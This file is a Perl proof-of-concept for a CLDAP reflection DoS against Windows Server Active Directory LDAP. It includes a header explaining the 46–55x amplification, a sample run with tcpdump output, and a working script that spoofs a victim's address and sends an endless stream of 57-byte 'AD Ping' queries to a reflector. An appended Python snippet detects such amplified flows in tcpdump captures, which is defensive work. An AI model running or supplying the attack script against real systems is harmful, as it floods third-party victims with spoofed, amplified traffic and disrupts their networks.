#!/usr/bin/perl
#
#MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
#(CLDAP "AD Ping") query reflection DoS PoC
#
#Copyright 2016 (c) Todor Donev
#Varna, Bulgaria
#todor.donev@gmail.com
#https://www.ethical-hacker.org/
#https://www.facebook.com/ethicalhackerorg
#http://pastebin.com/u/hackerscommunity
#
#MS Windows Server 2016 [NOT TESTED !!!]
#
#Description:
#The attacker sends a simple query to a vulnerable reflector
#supporting the Connectionless LDAP service (CLDAP) and using
#address spoofing makes it appear to originate from the intended
#victim. The CLDAP service responds to the spoofed address,
#sending unwanted network traffic to the attacker's intended target.
#
#Amplification techniques allow bad actors to intensify the size
#of their attacks, because the responses generated by the LDAP
#servers are much larger than the attacker's queries. In this case,
#the LDAP service responses are capable of reaching very high
#bandwidth and we have seen an average amplification factor of
#46x and a peak of 55x.
#
#
#Disclaimer:
#This or previous program is for Educational purpose ONLY. Do not
#use it without permission. The usual disclaimer applies, especially
#the fact that Todor Donev is not liable for any damages caused by
#direct or indirect use of the information or functionality provided
#by these programs. The author or any Internet provider bears NO
#responsibility for content or misuse of these programs or any
#derivatives thereof. By using these programs you accept the fact
#that any damage (data loss, system crash, system compromise, etc.)
#caused by the use of these programs is not Todor Donev's
#responsibility.
#
#Use at your own risk and educational
#purpose ONLY!
#
#See also, UDP-based Amplification Attacks:
#https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
## perl cldapdrdos.pl 192.168.1.112 192.168.1.146
#[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
#[ ======
#[ Usg: cldapdrdos.pl <ldap server> <target> <port>
#[ Default port: 389
#[ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
#[ ======
#[ <todor.donev@gmail.com> Todor Donev
#[ Facebook: https://www.facebook.com/ethicalhackerorg
#[ Website: https://www.ethical-hacker.org/
#[ Sending CLDAP "AD Ping" packets..
#^C
## tcpdump -i eth0 -c4 port 389
#tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
#listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
#00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
#00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...
#00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
#00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL...
#4 packets captured
#6 packets received by filter
#0 packets dropped by kernel
#
#
#
use Net::RawIP;

print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $cldap  = $ARGV[0];           # reflector: the CLDAP (UDP/389) server
my $target = $ARGV[1];           # spoofed source address, i.e. the victim
my $port   = $ARGV[2] || '389';

die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);

# BER-encoded LDAP SearchRequest (message ID 1, empty base DN, scope
# baseObject, filter (objectclass=*)), followed by the attribute name
# "Netlogon"; 57 bytes on the wire, as seen in the tcpdump session above.
my $query  = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query    .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query    .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query    .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query    .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query    .= "\x65\x74\x6c\x6f\x67\x6f\x6e";

# Raw socket so the IP source address can be set to $target
my $sock = new Net::RawIP({ udp => {} }) or die;

print "[ Sending CLDAP \"AD Ping\" packets..\n";

while () {
    select(undef, undef, undef, 0.40);   # Sleep 400 milliseconds
    $sock->set({
        ip  => { saddr  => $target, daddr => $cldap },
        udp => { source => 31337,   dest  => $port, data => $query }
    });
    $sock->send;
}
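A defender-side complement to the capture shown in the header comment, added here and not part of the PoC: it parses tcpdump UDP summary lines, pairs requests to the CLDAP service port with the replies, and flags flows whose reply bytes exceed the request bytes by a given factor. The sample capture is constructed from the two request/response pairs above plus an unrelated DNS exchange; the threshold and function name are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: the PoC's own tcpdump lines plus a benign DNS flow.
SAMPLE_CAPTURE = """\
00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315
00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315
00:01:00.000000 IP client.50000 > dns.domain: UDP, length 40
00:01:00.001000 IP dns.domain > client.50000: UDP, length 120
"""

# tcpdump prints "host.port" (port may be a service name or a number);
# the greedy \S+ before the last dot keeps dotted IPs intact.
LINE_RE = re.compile(
    r"^\S+ IP (?P<src>\S+)\.(?P<sport>\S+) > (?P<dst>\S+)\.(?P<dport>\S+):"
    r" UDP, length (?P<len>\d+)"
)

CLDAP_PORTS = {"ldap", "389"}


def amplification_by_flow(capture, service_ports=CLDAP_PORTS, threshold=10.0):
    """Return {(server, client): reply_bytes / request_bytes} for UDP flows
    to the service port whose ratio reaches the threshold."""
    request_bytes = defaultdict(int)
    reply_bytes = defaultdict(int)
    for line in capture.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        size = int(m["len"])
        if m["dport"] in service_ports:        # client -> CLDAP server
            request_bytes[(m["dst"], m["src"])] += size
        elif m["sport"] in service_ports:      # CLDAP server -> client
            reply_bytes[(m["src"], m["dst"])] += size
    flagged = {}
    for flow, sent in request_bytes.items():
        ratio = reply_bytes[flow] / sent
        if ratio >= threshold:
            flagged[flow] = ratio
    return flagged


if __name__ == "__main__":
    for (server, client), ratio in amplification_by_flow(SAMPLE_CAPTURE).items():
        print(f"{server} -> {client}: {ratio:.1f}x amplification")
```

In the sample, the "client" is the spoofed source, so the flagged pair names the reflector and the victim; on a real sensor the same ratio computed per source address is what you would alert on.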